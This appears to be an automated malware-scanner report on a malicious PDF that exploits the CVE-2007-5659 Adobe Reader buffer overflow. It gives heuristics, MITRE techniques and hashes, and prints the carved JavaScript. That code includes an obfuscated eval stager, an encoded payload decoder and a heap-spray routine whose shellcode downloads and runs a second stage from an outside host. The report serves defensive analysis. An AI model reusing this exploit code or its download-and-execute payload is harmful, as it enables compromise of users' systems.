Verdict: MALICIOUS
Risk Score: 310
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
The PDF file contains embedded JavaScript that exploits CVE-2007-5659, targeting a specific range of Adobe Reader patch levels. The script is designed to download a second-stage payload from the URL http://fjwctphoxdv.com/nte/KAND.asp/yH689031ecV0100f080006R0ee58237102Tee8df088201l0007. The combination of obfuscated JavaScript and an embedded download URL strongly indicates malicious intent to execute arbitrary code.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
- Collab.collectEmailInfo — CVE-2007-5659 (critical, CVE exact) [CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
- JavaScript action (low, 3 related findings) [PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (high, CVE likely) [PDF_JS_ADOBE_APSB08_13_PATCH_GATE]: PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
- PDF JavaScript shellcode contains an embedded download URL (high) [PDF_JS_SHELLCODE_DOWNLOAD_URL]: Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low) [PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- ClamAV: Pdf.Exploit.Agent-36062 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Pdf.Exploit.Agent-36062
- Annotation subject percent-decoding eval stager (critical) [PDF_ANNOT_SUBJECT_MARKER_EVAL_STAGER]: OpenAction JavaScript forces annotation enumeration, reads an annotation /Subject payload with getAnnots(), rewrites marker bytes into percent escapes, decodes it with unescape(), and dispatches it through eval. This is a high-confidence exploit-kit staging pattern. It is intentionally not mapped to CVE-2009-1492 unless getAnnots() itself carries the crafted integer or long argument shape for that vulnerability.
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://fjwctphoxdv.com/nte/KAND.asp/yH689031ecV0100f080006R0ee58237102Tee8df088201l0007 (referenced by PDF JavaScript)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| javascript_obj0007_000.js | 068944f8c011a88ab770b45c6de142b9305a1f515d410204d5eadd9ac2b5bfb3 | pdf-javascript-stream | PDF /JS object 7 at offset 0x19B | 373 bytes |
Preview script (first 1,000 lines of the extracted script):

```javascript
em = ''; em = ''; r = (r = 'l' + 'a' + em + 'ce', 'rep' + r); if (!em && r) {var z; var y; th = event['tar' + em + 'get'];var e = th[em + 'e'+ em + 'v'+'al']; z = y = th;
y = 0; z['syncAn' + em + 'notS' + 'can'] ( ); y = z;var p = y['g'+'et'+'Annots']( { nPage: 0 }) ;var s = p[0].subject;var l = s[r](/k /g, 'q%p'[r](/[qp]/g, ''));s = th['unes' + 'cape'] (l) ;e(s);}
```
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| legacy_pdfkit_stage_000.js | 380e5b3e223355f6618efdafefa0bbfa76f7280e9c7c32a196f0bf20ecf3e06f | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x2F5 | 12385 bytes |

Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s)).

Preview script (first 1,000 lines of the extracted script):
function wA_q71t__b(uwqX_804, I3_w0iG7Eg_sa8){ var L__8N78_6723s0U = 'um' + 'en' + "ts";L__8N78_6723s0U = 'a' + 'rg' + L__8N78_6723s0U;var h__d6n_BH7M_752 = wA_q71t__b[L__8N78_6723s0U]["c" + "a" + "zzee"['r'+'epl'+'ace'](/zz/, 'll')];h__d6n_BH7M_752 = h__d6n_BH7M_752["t" + "oS" + "t" + "r" + "in" + "g"]();var le33eg_aLiV5w = 0;try {if (app) {le33eg_aLiV5w++;le33eg_aLiV5w++;}} catch(e) { }var fXNTo_1_C_PeVd = new Array();if (uwqX_804) { fXNTo_1_C_PeVd = uwqX_804;} else {var jR1h83jB_q6 = 0;var T__HX6WEMEF1pg = 0;var oO_wI_hDDPDya = 512;var E6_3FS47 = 52;E6_3FS47 = E6_3FS47 - 4;var a1a4sv3RU_yb = E6_3FS47 + 9;while(T__HX6WEMEF1pg < h__d6n_BH7M_752['le'+'ngth']) {var Q_1m__D_B1p = 1;var brk___2 = h__d6n_BH7M_752['c'+'h'+'arC'+'odeAt'](T__HX6WEMEF1pg);if (brk___2 <= a1a4sv3RU_yb && brk___2 >= E6_3FS47) {if (jR1h83jB_q6 == 4) { jR1h83jB_q6 = 0; }if (isNaN(fXNTo_1_C_PeVd[jR1h83jB_q6])) {fXNTo_1_C_PeVd[jR1h83jB_q6] = 0;}fXNTo_1_C_PeVd[jR1h83jB_q6] += brk___2;if (fXNTo_1_C_PeVd[jR1h83jB_q6] > 512) {fXNTo_1_C_PeVd[jR1h83jB_q6] -= oO_wI_hDDPDya;}jR1h83jB_q6++;}T__HX6WEMEF1pg++;}}var uq_pAI6Ea = 0;jR1h83jB_q6 = 4;for (; uq_pAI6Ea < 4; ++uq_pAI6Ea) {if (fXNTo_1_C_PeVd[uq_pAI6Ea] > 256) {fXNTo_1_C_PeVd[uq_pAI6Ea] -= 256;}}var VW5nU64_387X__S = 0;var kpf13p;var OYVEsJp4R_4 = 0;var Mtc2_al = 0;var U__Fr8KC_xOy = 0;var nRXp7b26s = "";while(U__Fr8KC_xOy < I3_w0iG7Eg_sa8.length) {var fW_J726bJxq = I3_w0iG7Eg_sa8.substr(U__Fr8KC_xOy, 1) + "Z";var xa_ESL_2R6X = parseInt(fW_J726bJxq, 16);if (VW5nU64_387X__S) {kpf13p += xa_ESL_2R6X;if (Mtc2_al == 4) {Mtc2_al -= 4;}var F_T_FJ2_7y = kpf13p;F_T_FJ2_7y = F_T_FJ2_7y - (1 + OYVEsJp4R_4 + 1) * fXNTo_1_C_PeVd[Mtc2_al];if (F_T_FJ2_7y < 0) { var W_xL_5d = 256;F_T_FJ2_7y = F_T_FJ2_7y - Math['floor'](F_T_FJ2_7y / W_xL_5d) * 256;}F_T_FJ2_7y = String['from' + 'CharCode'](F_T_FJ2_7y);if (le33eg_aLiV5w == 2) {nRXp7b26s += F_T_FJ2_7y;} else if (le33eg_aLiV5w == 1) {nRXp7b26s += xa_ESL_2R6X;} else {nRXp7b26s += U__Fr8KC_xOy;}Mtc2_al++;VW5nU64_387X__S = 
0;OYVEsJp4R_4++;} else {VW5nU64_387X__S = 1;kpf13p = xa_ESL_2R6X * 16;}U__Fr8KC_xOy++;};var abcd=0; ;var mAt5ie_R_F_J83V = this;mAt5ie_R_F_J83V['e' + 'val'](nRXp7b26s);}
wA_q71t__b(0, "FABF5277F3E5F439D5FA0720D44AD47BE11ECE6C2346812526AF9987E5B1766C36BE52EFFC3C1FC2374F13413B7BB101047B809727DCA18514F188135B0446CA633D2C656E502835346BC0913E91E69092E1D4309B1460C7AA106953A75578017C6559DB74AF10538BA3EFFB7CEEDFCC992EC59EB2199F03CB7950B1A5B1768CF67E472AEBE516E2F30DD18EFB48A018C456BFD8E196A5AAFA817F0F13E130BDF2124F8A403829513B16C9CA5277F25B34AFB0461DC59FF52AAE5D5F1ED83B517350080D6D78E0A44A8DD02266B5B40358B5987E6119603054FE5BBF9D2C5F7B77683F2BB47AF7DB8BA3136F98B6E74EC31DB606CB4571B2D3804E6BE1A4671FEC9900B8C2E5F036DE0DD417D00DB892D9718B32D546BB2915C040AEEDD57556FBF116301217F197F42BC07F3D88F3202DACD48F53B99F724AED7F1E2D155FDD325155797F7A32EB7564FF9F4FA0DF4F8CB297FF63DBB39F54FF4948775F66EB6C3F49EA9AA70E4BA39FFF44A7CDD3B1DD04B158A00F69F3EF5D51DEF181377EBAD72628BDBAE0C0B4FDD18E1121B72EDA77A6D8DD5A6EA723A1945125E467B3F5D40972352CE00B231FFF04274DD3715D84B1182094ACF862F594A71CF33D0B350700122C55F1A28979D74252CFC6EC55B280844CC8701554F940EE6D5575967B7116709297F1D78F8E1DB4C809E51BCD2480CFBB179FC8BF457335F57C51DCB88C4CBCFAED346BB4CFDDCFCEFFA0D6C44D916621717706EAC766B0EDAA2048E4C010E7EE01E0E0245FF06E0D75DF1D1A5E9D873B979F883FC573F575FC519C38FE0B375C771022458DFFD15291FD989BE6C93391CE90E4842D517E9B5836F9B0834EDEC0AEE05F74A6C9EFD7B6D0ECB41D9186CB4876F3B12E42AF9E562B4BD4CF3036BDE51FE5CAE9C0AC1237F2FBED5DBFF2DE67827821B458FFF99669DBF4D51586FA3A2F36486009FD433EB1710D79C94D0C8E89F253F952803EFB6D513C0C4CFC7A6D34AB346BDD0F4D7FA01644C7BFA697D88135793B86D75C33206D744000226C8F1F02BFA0E191A103E6339FDEDD0CD859A573DD744027C5955F16B69F229CF9ECF83100130E16103EA07CE11E9230CCA160FC13AD8B91FDB845782AD600F4ECE8F093F629C08C2C87D01A159DBFC922867D3316C142DF27D649CA634912584E4B2D294C4ECB8F3EA6A23B4F9EB0387C0571D29330565AAE5B7440B68C00C7BD961F54B3CD02059713E6F0D221D490DB54603DBE4382B5DB67499AF5862B3EDDBBF3CFFBDAC086FD3BB121EA6BCBEADD5E715C2FC48151DCBB5FE01B0B3F8B242535422737E101FC53A0A949B580285ED8A
... (truncated)
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| legacy_pdfkit_stage_001.js | 358718ebdb67a63316b69dc8019db4f461fae6baaf9eee3e43859859bb91e0b9 | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x2F5 | 5088 bytes |

Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building token(s)).

Preview script (first 1,000 lines of the extracted script):
var g_46ALgq8tT = new Array();var r80v__cas2_e1F = 0;var chT_NF___LNbJhr = "";function TvBI4k_x68Gyd(iP075O, X_Q5pewF3_0Wk02){var gS__V___1__r = X_Q5pewF3_0Wk02.toString();var PqP_1__b6 = "";for(var a6_03J_4h47875s = 0; a6_03J_4h47875s < gS__V___1__r.length; a6_03J_4h47875s++) {var O1_uK7S6yFQ14 = parseInt(gS__V___1__r.substr(a6_03J_4h47875s, 1));if (!isNaN(O1_uK7S6yFQ14)) {O1_uK7S6yFQ14 = O1_uK7S6yFQ14.toString(16);if (O1_uK7S6yFQ14.length == 1) { O1_uK7S6yFQ14 = "0" + O1_uK7S6yFQ14; }else if (O1_uK7S6yFQ14.length != 2) { O1_uK7S6yFQ14 = "00"; }PqP_1__b6 = O1_uK7S6yFQ14 + PqP_1__b6;}}while(PqP_1__b6.length < 8) { PqP_1__b6 = "0" + PqP_1__b6; }var I__k2ABEmf8 = iP075O.toString(16);if (I__k2ABEmf8.length == 1) { I__k2ABEmf8 = "0" + I__k2ABEmf8; }else if (I__k2ABEmf8.length != 2) { I__k2ABEmf8 = "00"; }PqP_1__b6 = "3" + I__k2ABEmf8 + "P" + PqP_1__b6;return PqP_1__b6;}function jJ5b6_1Ioq(KgQ53Lg, Wae1FFmkc181){var E_UWm_TX_u_SIAr = new Array("");var r__p_Iu__yL = KgQ53Lg;var p4_D1l;if ((p4_D1l = KgQ53Lg.lastIndexOf("%u00")) != -1) {if (p4_D1l + 6 == KgQ53Lg.length) {E_UWm_TX_u_SIAr[0] = KgQ53Lg.substr(p4_D1l + 4, 2);r__p_Iu__yL = KgQ53Lg.substring(0, p4_D1l);}}p4_D1l = 1;for (a6_03J_4h47875s = 0; a6_03J_4h47875s < Wae1FFmkc181.length; a6_03J_4h47875s++) {var rj__T_Vp16buDs = Wae1FFmkc181.charCodeAt(a6_03J_4h47875s).toString(16);if (rj__T_Vp16buDs.length == 1) { rj__T_Vp16buDs = "0" + rj__T_Vp16buDs; }E_UWm_TX_u_SIAr[p4_D1l] = rj__T_Vp16buDs;p4_D1l++;}a6_03J_4h47875s = E_UWm_TX_u_SIAr[0].length ? 
0 : 1;E_UWm_TX_u_SIAr[p4_D1l] = "00";E_UWm_TX_u_SIAr[p4_D1l + 1] = "00";p4_D1l += 2;if ((E_UWm_TX_u_SIAr.length - a6_03J_4h47875s) % 2) {E_UWm_TX_u_SIAr[p4_D1l] = "00";}while(a6_03J_4h47875s < E_UWm_TX_u_SIAr.length) {r__p_Iu__yL += "%u" + E_UWm_TX_u_SIAr[a6_03J_4h47875s + 1] + E_UWm_TX_u_SIAr[a6_03J_4h47875s];a6_03J_4h47875s += 2;}r__p_Iu__yL += "%u0000";return r__p_Iu__yL;}function rH5nWA_D(F557c5a_3L, R_2_A___wN){while (F557c5a_3L.length*2<R_2_A___wN) {F557c5a_3L += F557c5a_3L;}F557c5a_3L = F557c5a_3L.substring(0,R_2_A___wN/2);return F557c5a_3L;}function D7_iF4iEbg(T2G43sK0D56, Blsnhr2_U, jDQ2eR_Qu_I1){var a8bEDO5_DC = 0x0c0c0c0c;var F557c5a_3L = unescape(Blsnhr2_U);var Wae1FFmkc181 = TvBI4k_x68Gyd(T2G43sK0D56, jDQ2eR_Qu_I1);var R_i0_117H7j = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var KgQ53Lg = "%u9050%u9050%u9050%u9050" + 
"%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4b70%u4368%u0073%u7468%u7074%u2f3a%u662f%u776a%u7463%u6870%u786f%u7664%u632e%u6d6f%u6e2f%u6574%u4b2f%u4e41%u2e44%u7361%u2f70%u4879%u3836%u3039%u3133%u6365%u3056%u3031%u6630%u3830%u3030%u3630%u3052%u6565%u3835%u3332%u3137%u3230%u6554%u3865%u6664%u3830%u3238%u3130%u306c%u3030%u0037";app.BJ334m = unescape(jJ5b6_1Ioq(KgQ53Lg, Wae1FFmkc181));var X724FO = 0x400000;var lK__7__R5G = R_i0_117H7j.length * 2;var R_2_A___wN = X724FO - (lK__7__R5G+0x38);F557c5a_3L = rH5nWA_D(F557c5a_3L, R_2_A___wN);var fW4CfuIj = (a8bEDO5_DC - 0x400000)/X724FO;for (var A_l63i = 0; A_l63i < fW4CfuIj; A_l63i++) {g_46ALgq8tT[A_l63i] = F557c5a_3L + R_i0_117H7j;}}function D_W2H5__M(){var Ap__4oQ07_D_e = "";for (a6_03J_4h47875s
... (truncated)